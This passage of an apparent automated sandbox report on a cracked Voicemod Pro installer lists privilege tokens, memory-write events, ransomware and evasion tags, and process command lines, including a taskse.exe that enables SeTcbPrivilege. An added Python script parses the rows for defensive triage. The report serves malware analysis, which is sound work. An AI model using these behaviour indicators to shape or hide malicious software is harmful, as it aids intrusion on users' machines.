Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: 33 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
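
To triage a table like the one above without reading every row by hand, the following Python is an added example written for this page by the editor; it is not part of the sandbox report and not a tool the report uses. It parses rows in this report's four-column layout (Description, Indicator, Process, Target), which is awkward only because the Process column is a Windows path that itself contains spaces, then flags high-value privileges enabled by images running from user-writable directories and walks the "PID X wrote to memory of Y" rows to rebuild a process ancestry. The sample rows are copied from the tables on this page; the privilege set and the list of user-writable path prefixes are the editor's assumptions, not something the report states.

```python
import re
from collections import defaultdict

# Row layout of the signature tables in this report:
#   "<Description> <Indicator> <Process> <Target>"
# Columns are space-separated, but Process (and often Indicator/Target) are
# Windows paths that contain spaces, so the split is anchored on column shape:
# Indicator is "N/A", a \REGISTRY\... key or a file path; Process is an
# absolute path; Target is "N/A" or an absolute path and runs to end of line.
ROW_RE = re.compile(
    r"^(?P<description>.+?) "
    r"(?P<indicator>N/A|\\REGISTRY\\.+?|[A-Za-z]:\\.+?) "
    r"(?P<process>[A-Za-z]:\\.+?) "
    r"(?P<target>N/A|[A-Za-z]:\\.+)$"
)
WPM_RE = re.compile(r"^PID (?P<parent>\d+) wrote to memory of (?P<child>\d+)$")

# Triage policy (editor's assumption, not part of the report): one of these
# privileges enabled by an image in a user-writable directory is looked at first.
HIGH_VALUE = {
    "SeTcbPrivilege", "SeDebugPrivilege", "SeLoadDriverPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
}
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")

# Constructed sample: rows copied from the tables on this page, deduplicated.
SAMPLE = r"""Description Indicator Process Target
Token: SeLoadDriverPrivilege N/A C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 454771.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 5116 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Windows\system32\cmd.exe
PID 4488 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
"""


def parse_rows(text):
    """Split report rows into dicts; header lines and blanks are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Description Indicator"):
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError(f"row does not fit the four-column layout: {line!r}")
        rows.append(m.groupdict())
    return rows


def privilege_findings(rows):
    """Map image path -> set of HIGH_VALUE privileges it enabled, restricted to
    images running from USER_WRITABLE locations."""
    findings = defaultdict(set)
    for row in rows:
        if not row["description"].startswith("Token: "):
            continue
        privilege = row["description"][len("Token: "):]
        process = row["process"]
        if privilege in HIGH_VALUE and process.lower().startswith(USER_WRITABLE):
            findings[process].add(privilege)
    return dict(findings)


def process_chain(rows, pid):
    """Follow WriteProcessMemory rows from a child PID up to the topmost parent,
    returning image paths from the child outward (empty if the PID is unknown)."""
    edges = {}
    for row in rows:
        m = WPM_RE.match(row["description"])
        if m:
            edges[int(m["child"])] = (int(m["parent"]), row["process"], row["target"])
    chain, seen = [], set()
    while pid in edges and pid not in seen:   # seen-set guards against PID reuse loops
        seen.add(pid)
        parent_pid, parent_path, child_path = edges[pid]
        if not chain:
            chain.append(child_path)
        chain.append(parent_path)
        pid = parent_pid
    return chain


if __name__ == "__main__":
    rows = parse_rows(SAMPLE)
    for process, privs in privilege_findings(rows).items():
        print(f"{process}: {', '.join(sorted(privs))}")
    print(" <- ".join(process_chain(rows, 2104)))
```

On the sample rows this yields one privilege finding, C:\Users\Admin\Downloads\taskse.exe enabling SeTcbPrivilege, and rebuilds the ancestry devcon.exe <- cmd.exe <- cmd.exe <- VoicemodSetup.tmp <- VoicemodSetup.exe. The path filter is deliberately narrow: it says nothing about WMIC.exe, which the table shows enabling a long list of privileges from a system directory, so read its output alongside the Command Line section of the report rather than as a verdict on its own.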

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe
PID 5116 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe
PID 3272 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe
PID 5116 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe
PID 5116 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Windows\system32\cmd.exe
PID 4488 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 4488 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 3260 wrote to memory of 976 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 3260 wrote to memory of 2080 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 4488 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 3260 wrote to memory of 4432 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 5116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe
PID 2540 wrote to memory of 4208 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1172 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4620 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4812 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1112 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 2868 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4824 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1408 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4964 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 2392 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4692 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 1396 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1152 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4576 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 940 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp" /SL5="$60214,22991991,87040,C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe

"C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe" /quiet /norestart

C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe

"C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 /quiet /norestart

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe

"C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe" /quiet /norestart

C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe

"C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe" -burn.filehandle.attached=556 -burn.filehandle.self=692 /quiet /norestart

C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe

"C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe" defaultdevices.txt

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\Voicemod Desktop\driver\setupDrv.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "devcon.exe dp_enum"

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon.exe dp_enum

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon install vmdrv.inf *VMDriver

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{d6d9d755-21a1-004a-9992-bca29bcb94f0}\vmdrv.inf" "9" "499a51a03" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "c:\program files\voicemod desktop\driver"

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:ed86ca11e5016dc2:VOICEMOD_Driver:11.18.35.982:*vmdriver," "499a51a03" "000000000000014C"

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon update vmdrv.inf *VMDriver

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:ed86ca11e5016dc2:VOICEMOD_Driver:11.18.35.982:*vmdriver," "499a51a03" "000000000000014C"

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x578 0x3a4

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-alien-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-android-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-android-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-aphonic-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-beach*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-capella*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-reggae*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-rock*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cave*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cop-chase*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cop-radio*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-fear-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-fear-background-in*.wav

C:\Windows\SYSTEM32\cmd.exe

